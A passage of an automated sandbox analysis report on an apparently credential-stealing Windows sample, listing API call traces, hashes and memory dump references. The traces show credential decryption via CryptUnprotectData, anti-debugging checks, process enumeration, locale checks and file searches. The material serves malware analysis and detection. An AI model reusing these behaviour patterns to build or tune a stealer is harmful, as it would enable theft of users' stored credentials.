                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID: B
                        • API String ID: 2533653975-2248957098
                        • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                        • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                        • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                        • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                        • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N@
                        • API String ID: 4291131564-4229412743
                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                        • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                        • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 040B7E48
                        • LocalAlloc.KERNEL32(00000040,?), ref: 040B7E60
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 040B7E74
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 040B7EC9
                        • LocalFree.KERNEL32(00000000), ref: 040B7F89
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID:
                        • API String ID: 3090951853-0
                        • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                        • Instruction ID: eff0401ecb1636de8391406debc935c13fbcaf108f627cee4a25714bc6040993
                        • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                        • Instruction Fuzzy Hash: EA412A71A50218ABDB24DB94DC88FEDB3B4FB48708F204199E149B7190DB742F85CFA9
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                        • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                        • String ID:
                        • API String ID: 2579439406-0
                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                        • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                        • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 040BBE09
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 040BBE1E
                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 040BBE29
                        • GetCurrentProcess.KERNEL32(C0000409), ref: 040BBE45
                        • TerminateProcess.KERNEL32(00000000), ref: 040BBE4C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                        • String ID:
                        • API String ID: 2579439406-0
                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                        • Instruction ID: 6499add1e4e183ced19e68a4f8bd4c6b13ae2e2991a7e6cf876f507599a5d0a4
                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                        • Instruction Fuzzy Hash: 2321A2BC9002059FDB14DF69F8896963BF4FB0A314F504039E94997264EBB06981EB4D
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                        • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 3657800372-0
                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                        • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                        • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 040A74B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040A74BB
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 040A74E8
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 040A750B
                        • LocalFree.KERNEL32(?), ref: 040A7515
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                        • Instruction ID: 320c99c7681db7e9c8a55361f5a6bdb720a77221d2296c63061fb30a61b0ebf5
                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                        • Instruction Fuzzy Hash: 2801C0B5B80208BBEB14DFE4DD45F9D77B9EB44705F108155F705BB2C0D6B0AA018B65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                        • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                        • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                        • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                        • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 040B9885
                        • Process32First.KERNEL32(00420ACA,00000128), ref: 040B9899
                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 040B98AE
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 040B98C3
                        • CloseHandle.KERNEL32(00420ACA), ref: 040B98E1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                        • Instruction ID: d6195237a3ee14073bbd96a683403868cc548d03841cb8d6035fdca6e788d584
                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                        • Instruction Fuzzy Hash: 18010CB9A50208FFDB20DFE4CD54BEDB7F9EF49700F004199A945A6280D774AA40DF91
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 040AE709
                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 040AE759
                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 040AE76F
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040AEE46
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID:
                        • API String ID: 433455689-0
                        • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                        • Instruction ID: 30702d1d9d7f5a39b0ddef5334114610c8a6b2d3d2b43300c82a185b8c787140
                        • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                        • Instruction Fuzzy Hash: D1121C71B102189BEB19FBA4DD94EED7379AF5430CF4041A9A58A72090EF347B88CF95
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                        • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                        • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,040A53EB,40000001,00000000,00000000,?,040A53EB), ref: 040B9127
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                        • Instruction ID: 0a954588ec3d94c48fb1bc298277a442205e5d5ad0e63872c9866d7ed88bd09d
                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                        • Instruction Fuzzy Hash: 1C110DB4204204BFDB00CF94DC98FAA33A9AFC9744F009958FA499B350D775F842EBA5
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,040A5155,00000000,00000000), ref: 040A9D56
                        • LocalAlloc.KERNEL32(00000040,?,?,?,040A5155,00000000,?), ref: 040A9D68
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,040A5155,00000000,00000000), ref: 040A9D91
                        • LocalFree.KERNEL32(?,?,?,?,040A5155,00000000,?), ref: 040A9DA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                        • Instruction ID: a782b91fe239bbbea29898daa90f5fa33238b16fb74b22111e72375f0ff3d5fc
                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                        • Instruction Fuzzy Hash: DF11A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208458FD159B390C776A951CB90
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                        • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                        • LocalFree.KERNEL32(?), ref: 00409BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                        • String ID:
                        • API String ID: 3243516280-0
                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                        • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                        • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 040A9DEB
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 040A9E0A
                        • memcpy.MSVCRT(?,?,?), ref: 040A9E2D
                        • LocalFree.KERNEL32(?), ref: 040A9E3A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                        • String ID:
                        • API String ID: 3243516280-0
                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                        • Instruction ID: 373eda70253990e65f6a90f857002ce5cc8ba69a442bf83637a9ac0a4f06be44
                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                        • Instruction Fuzzy Hash: 4D11FAB8A00209EFDB04CFA4D985AAE77F5FF89300F104558E915AB350D730AA10CF61
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,024DCA30,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,024DCA30,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,024DCA30,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                        • wsprintfA.USER32 ref: 00417AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 362916592-0
                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                        • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                        • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                        APIs
                        • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                        • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                        • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                        • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$GetProcAddress.$l
                        • API String ID: 0-2784972518
                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction ID: a82863a47a7ee32a9593f35e3836f8bcdee46c17d62b6d218b556de78f494dec
                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction Fuzzy Hash: AA3139B6910609DFEB10CF99C884AAEBBF5FF48328F15404AD541BB210D771FA55CBA4
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 040AF985
                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 040AF9D6
                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 040AF9EC
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040AFD18
                        • FindClose.KERNEL32(000000FF), ref: 040AFD2A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                        • Instruction ID: 7398a3f1ef8e0f18db7f28c23ad99b8e4d9bea0094660f77e83c7cadf4b4574d
                        • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                        • Instruction Fuzzy Hash: 3F11B131A0020DABEB28EBA0DC54DED7374AF10308F4042AAD59A76092EF343B49CF95
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                        • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                        • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                        • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 040BD156
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
